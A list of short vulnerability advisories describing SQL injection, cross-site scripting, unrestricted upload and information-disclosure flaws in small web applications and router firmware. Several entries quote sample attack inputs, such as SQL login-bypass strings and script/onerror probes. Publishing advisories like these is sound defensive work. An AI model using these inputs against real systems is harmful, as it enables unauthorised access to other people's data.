A vulnerability, which was classified as critical, was found in SourceCodester Online Mobile Management Store 1.0. This affects an unknown part of the file /admin/orders/view_order.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255585 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Online Mobile Management Store 1.0. Affected by this issue is some unknown functionality of the file /admin/product/manage_product.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255584.
A vulnerability classified as problematic was found in SourceCodester Online Mobile Management Store 1.0. Affected by this vulnerability is an unknown functionality of the component Product Price Handler. The manipulation of the argument quantity with the input -1 leads to business logic errors. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255583.
A vulnerability, which was classified as critical, has been found in SourceCodester Insurance Management System 1.0. This issue affects some unknown processing. The manipulation of the argument page leads to file inclusion. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255503.
A vulnerability classified as critical was found in CodeAstro Membership Management System 1.0. This vulnerability affects unknown code of the file settings.php. The manipulation of the argument currency leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-255502 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Online Mobile Management Store 1.0. This affects an unknown part of the file /classes/Users.php. The manipulation of the argument img leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255501 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Mobile Management Store 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/login.php. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255500.
A vulnerability was found in SourceCodester Online Mobile Management Store 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /?p=products. The manipulation of the argument search leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255499.
Transient DOS while decoding an ASN.1 OER message containing a SEQUENCE of unknown extensions.
A vulnerability was found in SourceCodester Online Mobile Management Store 1.0. It has been classified as problematic. Affected is an unknown function of the file /endpoint/update-tracker.php. The manipulation of the argument firstname leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-255498 is the identifier assigned to this vulnerability.
A vulnerability was found in Bdtask Hospita AutoManager up to 20240223 and classified as problematic. This issue affects some unknown processing of the file /hospital_activities/birth/form of the component Hospital Activities Page. The manipulation of the argument Description with the input &lt;img src=a onerror=alert(1)&gt; leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255497 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Bdtask Hospita AutoManager up to 20240223 and classified as problematic. This vulnerability affects unknown code of the file /investigation/delete/ of the component Investigation Report Handler. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255496. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in Bdtask Isshue Multi Store eCommerce Shopping Cart Solution 4.0. This affects an unknown part of the file /dashboard/Cinvoice/manage_invoice of the component Manage Sale Page. The manipulation of the argument Title leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255495.
A vulnerability classified as critical has been found in SourceCodester Simple Online Bidding System 1.0. This affects an unknown part of the file index.php. The manipulation of the argument category_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255393 was assigned to this vulnerability.
A vulnerability was found in CodeAstro House Rental Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file booking.php/owner.php/tenant.php. The manipulation leads to missing authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255392.
A vulnerability was found in SourceCodester Daily Habit Tracker 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /endpoint/update-tracker.php. The manipulation of the argument day leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255391.
A vulnerability was found in Mini-Tmall up to 20231017 and classified as critical. This issue affects some unknown processing of the file ?r=tmall/admin/user/1/1. The manipulation of the argument orderBy leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255389 was assigned to this vulnerability.
A vulnerability has been found in SourceCodester Block Inserter for Dynamic Content 1.0 and classified as critical. This vulnerability affects unknown code of the file view_post.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255388.
A vulnerability, which was classified as problematic, was found in SourceCodester Flashcard Quiz App 1.0. This affects an unknown part of the file /endpoint/update-flashcard.php. The manipulation of the argument question/answer leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255387.
A vulnerability, which was classified as problematic, has been found in SourceCodester FAQ Management System 1.0. Affected by this issue is some unknown functionality of the component Update FAQ. The manipulation of the argument Frequently Asked Question leads to cross site scripting. The attack may be launched remotely. VDB-255386 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic was found in SourceCodester FAQ Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /endpoint/add-faq.php. The manipulation of the argument question/answer leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255385 was assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester FAQ Management System 1.0. Affected is an unknown function of the file /endpoint/delete-faq.php. The manipulation of the argument faq leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255384.
A vulnerability was found in SourceCodester Computer Inventory System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /endpoint/update-computer.php. The manipulation of the argument model leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255383.
A vulnerability was found in SourceCodester Computer Inventory System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /endpoint/delete-computer.php. The manipulation of the argument computer leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-255382 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Computer Inventory System 1.0. It has been classified as problematic. This affects an unknown part of the file /endpoint/add-computer.php. The manipulation of the argument model leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255381 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Barangay Population Monitoring System up to 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /endpoint/update-resident.php. The manipulation of the argument full_name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255380.
A vulnerability, which was classified as problematic, was found in SourceCodester Petrol Pump Management Software 1.0. Affected is an unknown function of the file /admin/app/profile_crud.php. The manipulation of the argument username leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-255378 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Petrol Pump Management Software 1.0. This issue affects some unknown processing of the file /admin/edit_categories.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255377 was assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Petrol Pump Management Software 1.0. This vulnerability affects unknown code of the file /admin/edit_supplier.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255376.
A vulnerability classified as critical has been found in SourceCodester Petrol Pump Management Software 1.0. This affects an unknown part of the file /admin/app/login_crud.php. The manipulation of the argument email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255375.
A vulnerability was found in SourceCodester Petrol Pump Management Software 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/app/service_crud.php. The manipulation of the argument photo leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-255374 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Petrol Pump Management Software 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/app/product.php. The manipulation of the argument photo leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255373 was assigned to this vulnerability.
A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/list_ipAddressPolicy.php. The manipulation of the argument GroupId leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255301 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been classified as critical. Affected is an unknown function of the file /admin/list_localuser.php. The manipulation of the argument ResId leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255300. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in Panabit Panalog 202103080942. This vulnerability affects unknown code of the file /Maintain/sprog_upstatus.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255268. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in OpenBMB XAgent 1.0.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Privileged Mode. The manipulation leads to sandbox issue. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier VDB-255265 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Job Portal 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /Employer/EditProfile.php. The manipulation of the argument Address leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255128.
A vulnerability has been found in Surya2Developer Online Shopping System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file login.php of the component POST Parameter Handler. The manipulation of the argument password with the input nochizplz'+or+1%3d1+limit+1%23 leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255127.
A vulnerability, which was classified as problematic, was found in SourceCodester Online Learning System V2 1.0. Affected is an unknown function of the file /index.php. The manipulation of the argument page leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-255126 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Web-Based Student Clearance System 1.0. Affected by this issue is some unknown functionality of the file /admin/edit-admin.php of the component Edit User Profile Page. The manipulation of the argument Fullname leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254864.
A vulnerability classified as critical was found in SourceCodester Web-Based Student Clearance System 1.0. Affected by this vulnerability is an unknown functionality of the file /Admin/login.php. The manipulation of the argument txtpassword leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254863.
A vulnerability was found in SourceCodester Free and Open Source Inventory Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /app/ajax/search_sales_report.php. The manipulation of the argument customer leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254861 was assigned to this vulnerability.
A vulnerability was found in Ctcms 2.1.2. It has been declared as critical. This vulnerability affects unknown code of the file ctcms/apps/controllers/admin/Upsys.php. The manipulation leads to unrestricted upload. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254860.
A vulnerability was found in CodeAstro Membership Management System 1.0. It has been classified as critical. This affects an unknown part of the file /get_membership_amount.php. The manipulation of the argument membershipTypeId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254859.
A vulnerability has been found in SourceCodester Online Job Portal 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /Employer/ManageJob.php of the component Manage Job Page. The manipulation of the argument Qualification/Description leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254857 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in osuuu LightPicture up to 1.2.2. Affected is an unknown function of the file /app/controller/Setup.php. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254856.
A vulnerability classified as problematic was found in SourceCodester Online Job Portal 1.0. This vulnerability affects unknown code of the file /Employer/ManageWalkin.php of the component Manage Walkin Page. The manipulation of the argument Job Title leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-254854 is the identifier assigned to this vulnerability.
A vulnerability has been found in Byzoro Smart S42 Management Platform up to 20240219 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /useratte/userattestation.php. The manipulation of the argument hidwel leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254839. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in SourceCodester Employee Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /myprofile.php. The manipulation of the argument id with the input 1%20or%201=1 leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-254726 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Employee Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /cancel.php. The manipulation of the argument id with the input 1%20or%201=1 leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254725 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Employee Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /psubmit.php. The manipulation of the argument pid with the input '+or+1%3d1%23 leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254724.
A vulnerability was found in SourceCodester Complaint Management System 1.0 and classified as critical. This issue affects some unknown processing of the file users/register-complaint.php of the component Lodge Complaint Section. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254723.
A vulnerability, which was classified as problematic, was found in SourceCodester Employee Management System 1.0. Affected is an unknown function of the file /process/assignp.php of the component Project Assignment Report. The manipulation of the argument pname leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-254694 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been classified as problematic. This affects an unknown part of the file ?page=attendance&amp;class_id=1. The manipulation of the argument class_date with the input 2024-02-23%22%3E%3Cscript%3Ealert(1)%3C/script%3E leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254625 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Employee Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /Account/login.php. The manipulation of the argument txtusername leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254624.
A vulnerability has been found in SourceCodester Complete File Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/ of the component Admin Login Form. The manipulation of the argument username with the input torada%27+or+%271%27+%3D+%271%27+--+- leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254623.
A vulnerability, which was classified as critical, was found in SourceCodester Complete File Management System 1.0. Affected is an unknown function of the file users/index.php of the component Login Form. The manipulation of the argument username with the input torada%27+or+%271%27+%3D+%271%27+--+- leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-254622 is the identifier assigned to this vulnerability.
A vulnerability was found in code-projects Library System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file Source/librarian/user/student/lost-password.php. The manipulation of the argument email leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-254618 is the identifier assigned to this vulnerability.
A vulnerability was found in code-projects Library System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file Source/librarian/user/student/registration.php. The manipulation of the argument email/regno/phone/username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254617 was assigned to this vulnerability.
A vulnerability was found in code-projects Library System 1.0. It has been classified as critical. Affected is an unknown function of the file Source/librarian/user/teacher/registration.php. The manipulation of the argument email/idno/phone/username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254616.
A vulnerability was found in code-projects Library System 1.0 and classified as critical. This issue affects some unknown processing of the file Source/librarian/user/teacher/login.php. The manipulation of the argument username/password leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254615.
A vulnerability has been found in code-projects Library System 1.0 and classified as critical. This vulnerability affects unknown code of the file Source/librarian/user/student/login.php. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-254614 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in CodeAstro House Rental Management System 1.0. This affects an unknown part of the component User Registration Page. The manipulation of the argument address with the input &lt;img src="1" onerror="console.log(1)"&gt; leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254613 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in CodeAstro House Rental Management System 1.0. Affected by this issue is some unknown functionality of the file signing.php. The manipulation of the argument uname/password leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254612.
A vulnerability classified as critical was found in CodeAstro Simple Voting System 1.0. Affected by this vulnerability is an unknown functionality of the file users.php of the component Backend. The manipulation leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254611.
A vulnerability classified as problematic has been found in PHPGurukul Tourism Management System 1.0. Affected is an unknown function of the file user-bookings.php. The manipulation of the argument Full Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-254610 is the identifier assigned to this vulnerability.
A vulnerability was found in code-projects Crime Reporting System 1.0. It has been rated as critical. This issue affects some unknown processing of the file police_add.php. The manipulation of the argument police_name/police_id/police_spec/password leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-254609 was assigned to this vulnerability.
A vulnerability was found in code-projects Crime Reporting System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file inchargelogin.php. The manipulation of the argument email/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254608.
A vulnerability was found in CodeAstro Membership Management System 1.0. It has been classified as critical. This affects an unknown part of the component Add Members Tab. The manipulation of the argument Member Photo leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254607.
A vulnerability was found in CodeAstro Membership Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /uploads/ of the component Logo Handler. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-254606 is the identifier assigned to this vulnerability.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in D-Link DIR-600M C1 3.08. Affected by this issue is some unknown functionality of the component Telnet Service. The manipulation of the argument username leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254576. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
A vulnerability classified as problematic was found in Limbas 5.2.14. Affected by this vulnerability is an unknown functionality of the file main_admin.php. The manipulation of the argument tab_group leads to sql injection. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254575. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in Bdtask Bhojon Best Restaurant Management Software 2.9. This issue affects some unknown processing of the file /dashboard/message of the component Message Page. The manipulation of the argument Title leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254531. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in GARO WALLBOX GLB+ T2EV7 0.5. This affects an unknown part of the file /index.jsp#settings of the component Software Update Handler. The manipulation of the argument Reference leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254397 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in ZKTeco ZKBio Access IVS up to 3.3.2. Affected by this issue is some unknown functionality of the component Department Name Search Bar. The manipulation with the input &lt;marquee&gt;hi leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254396. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in keerti1924 PHP-MYSQL-User-Login-System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /edit.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-254390 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in keerti1924 PHP-MYSQL-User-Login-System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /edit.php. The manipulation leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254389 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in keerti1924 PHP-MYSQL-User-Login-System 1.0. Affected is an unknown function of the file /signup.php. The manipulation of the argument username with the input &lt;script&gt;alert("xss")&lt;/script&gt; leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254388. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in Totolink X6000R 9.4.0cu.852_B20230719. Affected by this vulnerability is an unknown functionality of the file /etc/shadow. The manipulation leads to hard-coded credentials. It is possible to launch the attack on the local host. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254179. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in ECshop 4.1.8. Affected by this issue is some unknown functionality of the file /admin/view_sendlist.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250562 is the identifier assigned to this vulnerability.
A vulnerability was found in Netgear R7000 1.0.11.136_10.2.120 and classified as problematic. Affected by this issue is some unknown functionality of the file /debuginfo.htm of the component Web Management Interface. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. VDB-253382 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Netgear R7000 1.0.11.136_10.2.120 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /currentsetting.htm of the component Web Management Interface. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Linksys WRT54GL 4.30.18. It has been declared as problematic. This vulnerability affects unknown code of the file /SysInfo1.htm of the component Web Management Interface. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. VDB-253330 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Linksys WRT54GL 4.30.18. It has been classified as problematic. This affects an unknown part of the file /wlaninfo.htm of the component Web Management Interface. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. The identifier VDB-253329 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Linksys WRT54GL 4.30.18 and classified as problematic. Affected by this issue is some unknown functionality of the file /SysInfo.htm of the component Web Management Interface. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-253328. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability in the Eclipse Vert.x toolkit causes a memory leak in TCP servers configured with TLS and SNI support. When processing an unknown SNI server name assigned the default certificate instead of a mapped certificate, the SSL context is erroneously cached in the server name map, leading to memory exhaustion. This flaw allows attackers to send TLS client hello messages with fake server names, triggering a JVM out-of-memory error.
A vulnerability has been found in SourceCodester Product Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /supplier.php. The manipulation of the argument supplier_name/supplier_contact leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-253012.
A vulnerability, which was classified as critical, was found in CodeAstro Restaurant POS System 1.0. This affects an unknown part of the file update_product.php. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-253011.
A vulnerability, which was classified as problematic, has been found in CodeAstro Restaurant POS System 1.0. Affected by this issue is some unknown functionality of the file create_account.php. The manipulation of the argument Full Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-253010 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic was found in CodeAstro University Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /st_reg.php of the component Student Registration Form. The manipulation of the argument Address leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-253009 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in CodeAstro University Management System 1.0. Affected is an unknown function of the file /att_add.php of the component Attendance Management. The manipulation of the argument Student Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-253008.
A vulnerability was found in Juanpao JPShop up to 1.5.02. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/controllers/admin/app/AppController.php of the component API. The manipulation of the argument app_pic_url leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252998 is the identifier assigned to this vulnerability.
A vulnerability was found in Juanpao JPShop up to 1.5.02. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file api/config/params.php of the component API. The manipulation of the argument JWT_KEY_ADMIN leads to use of hard-coded cryptographic key . The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-252997 was assigned to this vulnerability.
A vulnerability was found in Jspxcms 10.2.0. It has been classified as problematic. Affected is an unknown function of the file /ext/collect/find_text.do. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252996.
A vulnerability was found in Jspxcms 10.2.0 and classified as problematic. This issue affects some unknown processing of the file /ext/collect/filter_text.do. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252995.
A vulnerability has been found in sepidz SepidzDigitalMenu up to 7.1.0728.1 and classified as problematic. This vulnerability affects unknown code of the file /Waiters. The manipulation leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252994 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in Byzoro Smart S20 Management Platform up to 20231120. This affects an unknown part of the file /sysmanage/sysmanageajax.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252993 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in Byzoro Smart S40 Management Platform up to 20240126. Affected by this issue is some unknown functionality of the file /useratte/web.php of the component Import Handler. The manipulation of the argument file_upload leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252992. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in Tongda OA 2017 up to 11.9. Affected by this vulnerability is an unknown functionality of the file /general/attendance/manage/ask_duty/delete.php. The manipulation of the argument ASK_DUTY_ID leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-252991.
A vulnerability classified as critical has been found in Tongda OA 2017 up to 11.10. Affected is an unknown function of the file /general/email/outbox/delete.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-252990 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in SourceCodester CRUD without Page Reload 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file fetch_data.php. The manipulation of the argument username/city leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252782 is the identifier assigned to this vulnerability.
